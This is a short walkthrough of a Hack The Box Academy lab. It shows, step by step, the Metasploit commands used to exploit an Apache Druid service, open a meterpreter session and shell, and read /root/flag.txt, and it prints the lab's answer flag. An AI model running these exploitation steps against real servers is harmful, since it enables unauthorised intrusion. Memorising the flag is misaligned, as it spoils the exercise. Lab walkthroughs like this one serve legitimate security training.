Payloads — Using the Metasploit Framework Module — HTB Walkthrough

TIER 0 MODULE: USING THE METASPLOIT FRAMEWORK

SECTION: Payloads

Please open your pwnbox or connect to the vpn in order to complete the tasks.

If you are not registered in HTB Academy, then use this link to register now: https://referral.hackthebox.com/mzxKOJt

1. Exploit the Apache Druid service and find the flag.txt file. Submit the contents of this file as the answer.

Open metasploit.

msfconsole -q

after that, search for the service ‘Apache Druid’.

The first one (index: 0) looks suitable, select it.

use 0

after that, configure your attack (set lhost, rhost).

set rhost <target-ip>

and

set lhost <your-vpn-ip>

Check that vpn IP by ifconfig and then under the tun0 section.

Now attack the machine.

run

When you get “meterpreter”. Start finding the ‘flag.txt’.

We can use the find command, but it won’t work in meterpreter.

So we will ask meterpreter for a shell.

shell

then will use the find command.

find / -name flag.txt -type f 2>/dev/null

it returned us: /root/flag.txt

Look inside the file,

cat /root/flag.txt

Answer: HTB{MSF_Expl01t4t10n}

Still stuck? Watch video!

☣️ HAPPY ETHICAL HACKING ☣️

DISCLAIMER: THIS CONTENT DOES NOT BELONG TO ME, I AM JUST WRITING A WALK-THROUGH OF A FREE MODULE OF HACK THE BOX ACADEMY. (WRITING WALKTHROUGHS OF FREE MODULES IS PERMITTED BY HTB ACADEMY)

The Malware Mender Walkthroughs